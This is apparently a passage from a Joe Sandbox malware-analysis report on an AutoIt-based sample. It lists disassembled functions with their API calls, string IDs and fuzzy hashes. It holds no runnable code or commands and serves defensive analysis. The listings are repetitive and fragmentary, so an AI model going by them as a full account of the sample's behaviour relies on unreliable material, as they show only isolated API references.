                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf_memmove
                                                          • String ID: , $$AUTOITCALLVARIABLE%d$%B
                                                          • API String ID: 3506404897-1212537876
                                                          • Opcode ID: 9089d54f754a397bb51a6383f846721670a2ba90a17744e5d7826d4e5289430b
                                                          • Instruction ID: 471d042db37bd1e4478eb6f2c1c96e83ad80027a2ea118a96e1cba53968770f0
                                                          • Opcode Fuzzy Hash: 9089d54f754a397bb51a6383f846721670a2ba90a17744e5d7826d4e5289430b
                                                          • Instruction Fuzzy Hash: B4219331700119ABCF15EF64CC82AAE7BB9AF45700F50046AF445BB1C1DB38EA45CF69
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00417772
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00417787
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00417794
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: 78d597d4e583345d1e0f51dc88a39c33c94ec059c92ffa65d4454601d18117c8
                                                          • Instruction ID: 2d8956deed2cafc964fdd9519bfe434fc9f5c39a1204a52514f751223289a4e0
                                                          • Opcode Fuzzy Hash: 78d597d4e583345d1e0f51dc88a39c33c94ec059c92ffa65d4454601d18117c8
                                                          • Instruction Fuzzy Hash: 36112332240208BAEF209F61CC01FEB37B9EF88B64F114129FA55A61D0C272E851CB24
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: D$@BE
                                                          • API String ID: 3494438863-2015448474
                                                          • Opcode ID: 0b8bf8f7bb084f41ce3a0aa86be66ecf004a47b5f31ec66ab269dc7f0c3c8f72
                                                          • Instruction ID: aa76a32750058acf770f12e2a8b74e7b1e41b2cf3e7c5e2cb4bab1b28589d691
                                                          • Opcode Fuzzy Hash: 0b8bf8f7bb084f41ce3a0aa86be66ecf004a47b5f31ec66ab269dc7f0c3c8f72
                                                          • Instruction Fuzzy Hash: 08F031712047119AF765CF56BC62AE627A8E700728F500466F700CE992EB68D8418B89
                                                          APIs
                                                          • __lock.LIBCMT ref: 003B9B94
                                                            • Part of subcall function 003B9C0B: __mtinitlocknum.LIBCMT ref: 003B9C1D
                                                            • Part of subcall function 003B9C0B: EnterCriticalSection.KERNEL32(00000000,?,003B9A7C,0000000D), ref: 003B9C36
                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 003B9BA4
                                                            • Part of subcall function 003B9100: ___addlocaleref.LIBCMT ref: 003B911C
                                                            • Part of subcall function 003B9100: ___removelocaleref.LIBCMT ref: 003B9127
                                                            • Part of subcall function 003B9100: ___freetlocinfo.LIBCMT ref: 003B913B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                          • String ID: 8D$8D
                                                          • API String ID: 547918592-939907393
                                                          • Opcode ID: dc9319a854c54e9749d59a628cddd17204c91b1bdb528d514766dc48e596839c
                                                          • Instruction ID: a79d33bdde465ebf7cebae30672ea0086a5d1a82a8e5aea0b9cccd2660c91c3b
                                                          • Opcode Fuzzy Hash: dc9319a854c54e9749d59a628cddd17204c91b1bdb528d514766dc48e596839c
                                                          • Instruction Fuzzy Hash: 35E08C31983300AAFA22FBE9A903B883664EB01B29F20016BF345594C1CE782400C61F
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00394B83,?), ref: 00394C44
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00394C56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: 38e65f73a289646da8afb3d058597fee2ad15558154e3ab0f8a618dbaa98690c
                                                          • Instruction ID: ab95a8f2883efb91cd3f374542115ea5c8deb683782c64b85939fa7b5035f766
                                                          • Opcode Fuzzy Hash: 38e65f73a289646da8afb3d058597fee2ad15558154e3ab0f8a618dbaa98690c
                                                          • Instruction Fuzzy Hash: 4AD02E30504B23EFDB208F31D808B8A73E4AF01340B22C83ED49AC6268E778D8C1CA14
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00394BD0,?,00394DEF,?,004552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00394C11
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00394C23
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: 55c564344fe98cda63178036efaaff0f934f0c3707941bd687a1b31ece804a25
                                                          • Instruction ID: bd44159c3878998f2099ac5653dbc6b07c9b1160d73c1a6a8963a2dec109e8b3
                                                          • Opcode Fuzzy Hash: 55c564344fe98cda63178036efaaff0f934f0c3707941bd687a1b31ece804a25
                                                          • Instruction Fuzzy Hash: 00D0C230500713EFDB205F70D808746B6D5EF08342B11CC3A9485C2160E7B4D882CA14
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00411039), ref: 00410DF5
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00410E07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: 5adeb92f018ad5ac72659eb9971cbe29e7b41c2fd041f3cafd4ce9c48607d09e
                                                          • Instruction ID: f322ad55550e73acd7edddc4931f1358b65c89fac693ec8d908a36e216b53842
                                                          • Opcode Fuzzy Hash: 5adeb92f018ad5ac72659eb9971cbe29e7b41c2fd041f3cafd4ce9c48607d09e
                                                          • Instruction Fuzzy Hash: 4FD0E271610722EFE7209B76C8087877AE5AF04352F21CC3EA48AD2650E7B8D8D08A58
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00408CF4,?,0041F910), ref: 004090EE
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00409100
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: 1f06efe39455821498c2d53c413545a04739961eecf744ebfa25e9b1cce574c7
                                                          • Instruction ID: ec8f7a714c1de4af3e51073bab71b1e3a9c4f461940be7fa36208951368ca735
                                                          • Opcode Fuzzy Hash: 1f06efe39455821498c2d53c413545a04739961eecf744ebfa25e9b1cce574c7
                                                          • Instruction Fuzzy Hash: 45D01234614723EFE7209F31D81864776D4AF05351B11C83FD486D6691E7B8DC84C654
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: de5b8a5dff419588438b86c31019c198c0710af9ebd9adb74ffb0430841b68fa
                                                          • Instruction ID: 2c25049da4ec77d4bc2f550ef3a3f712b514e439a489923240cdab75f185848a
                                                          • Opcode Fuzzy Hash: de5b8a5dff419588438b86c31019c198c0710af9ebd9adb74ffb0430841b68fa
                                                          • Instruction Fuzzy Hash: D6D05B73804118FBCB06D7D0AC88DF9777CA708301F140563F502D2960E2759B54E625
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b830bf0d74108d64e528e2530fe07e4112e87c9009b33f30ac4314347079c73
                                                          • Instruction ID: 2b5c15ad3ec4c59c23e1c88e9ab77094e055059dbc4722c5553ec9d55f65efe5
                                                          • Opcode Fuzzy Hash: 7b830bf0d74108d64e528e2530fe07e4112e87c9009b33f30ac4314347079c73
                                                          • Instruction Fuzzy Hash: F6C18174A04266EFDB15CF96C884EAEBBB5FF48304B158698E805DB391D730ED41DB90
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 0040E0BE
                                                          • CharLowerBuffW.USER32(?,?), ref: 0040E101
                                                            • Part of subcall function 0040D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0040D7C5
                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0040E301
                                                          • _memmove.LIBCMT ref: 0040E314
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                          • String ID:
                                                          • API String ID: 3659485706-0
                                                          • Opcode ID: d1d6b505c6bd16a5efb63c39876ead482c382db363374b993821342e5b66280b
                                                          • Instruction ID: 9b85c7072f0da6ed4ec381ec0255613488b2f0d67cd6334f321bbde22b09e9fc
                                                          • Opcode Fuzzy Hash: d1d6b505c6bd16a5efb63c39876ead482c382db363374b993821342e5b66280b
                                                          • Instruction Fuzzy Hash: 00C17A71608301CFC705DF29C480A6ABBE4FF89314F04896EF999AB391D734E946CB86
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 004080C3
                                                          • CoUninitialize.OLE32 ref: 004080CE
                                                            • Part of subcall function 003ED56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003ED5D4
                                                          • VariantInit.OLEAUT32(?), ref: 004080D9
                                                          • VariantClear.OLEAUT32(?), ref: 004083AA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
                                                          • Opcode ID: 10a9512b5f329dd79094671146d23832bcdc6eadaade95be2e1a4d3f4643bfd9
                                                          • Instruction ID: 12ac0fe647402a1d290cb3fec9448ec7578fd379a7ba47af81651f70b87f5fbd
                                                          • Opcode Fuzzy Hash: 10a9512b5f329dd79094671146d23832bcdc6eadaade95be2e1a4d3f4643bfd9
                                                          • Instruction Fuzzy Hash: 1AA17C356047019FCB11EF18C581B2AB7E4BF89314F04446EF99AAB3A2DB34ED05CB86
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: 61f95c48151254a6398ef9c83d8b71222a74ee28aee0d9440b5d2a74fcef6012
                                                          • Instruction ID: 35def3fc6057051d11a97138bfb1021df743ce63d2132bc37fa09035483ad032
                                                          • Opcode Fuzzy Hash: 61f95c48151254a6398ef9c83d8b71222a74ee28aee0d9440b5d2a74fcef6012
                                                          • Instruction Fuzzy Hash: 0851FA74B003919EDF26AF66C89267EB7E89F24350F20D92FE546DB6D1DB30D8408701
                                                          APIs
                                                          • GetWindowRect.USER32(012EEB00,?), ref: 00419863
                                                          • ScreenToClient.USER32(00000002,00000002), ref: 00419896
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00419903
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: 0e96c33d5adf64289bbeaa3b944b2a138299126988eeeec40443d69e7c495111
                                                          • Instruction ID: 8644aceb3a2bda4366f5c09760f658f7663e9225b8a11597a70c9af1c08a7f10
                                                          • Opcode Fuzzy Hash: 0e96c33d5adf64289bbeaa3b944b2a138299126988eeeec40443d69e7c495111
                                                          • Instruction Fuzzy Hash: 9F514C74A10209AFCF14DF64C890AEE7BB5FF45360F10816AF8659B3A0D734AD81CB94
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003E9AD2
                                                          • __itow.LIBCMT ref: 003E9B03
                                                            • Part of subcall function 003E9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003E9DBE
                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 003E9B6C
                                                          • __itow.LIBCMT ref: 003E9BC3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: d13eb9b01736d599e0ade35529e86cafa0d7dbad53793f2ce1c71f4171dd3618
                                                          • Instruction ID: 6be4de84c84bc2d82018923045a8a763fb6b9a898b23fe8a73724fca80cfe662
                                                          • Opcode Fuzzy Hash: d13eb9b01736d599e0ade35529e86cafa0d7dbad53793f2ce1c71f4171dd3618
                                                          • Instruction Fuzzy Hash: 2B418170A00359ABDF26EF55D845BFE7BB9EF44710F00006AF905AB2D1DB709A44CBA1
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 004069D1
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004069E1
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00406A45
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00406A51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                          • String ID:
                                                          • API String ID: 2214342067-0
                                                          • Opcode ID: 19c4f94c8908a18a5379ee24b7b76915885357dcfe69516a4d2c8082bcce6993
                                                          • Instruction ID: d80ded981225c3e5c40cae412e90d49e6499c0fe0f96cfcb4422fc9c5495402c
                                                          • Opcode Fuzzy Hash: 19c4f94c8908a18a5379ee24b7b76915885357dcfe69516a4d2c8082bcce6993
                                                          • Instruction Fuzzy Hash: 8C41AF747002006FEB22BF28CC87F7A77E49B45B10F04802DFA19AF2C2DA749D018B95
                                                          APIs
                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0041F910), ref: 004064A7
                                                          • _strlen.LIBCMT ref: 004064D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: 4796bd86a4d11bf109db6679b08074bd5665a6a72bba3babc0b10911468a4c3c
                                                          • Instruction ID: c06998eac823925074b180e6cae52c14cb4a66d44822ec18c32a1e435468fb8f
                                                          • Opcode Fuzzy Hash: 4796bd86a4d11bf109db6679b08074bd5665a6a72bba3babc0b10911468a4c3c
                                                          • Instruction Fuzzy Hash: 0841DA31600104ABCB15FB68EC96FBEB7A9AF44314F10816AF816AF2D2DB34ED15C755
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003FB89E
                                                          • GetLastError.KERNEL32(?,00000000), ref: 003FB8C4
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003FB8E9
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003FB915
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
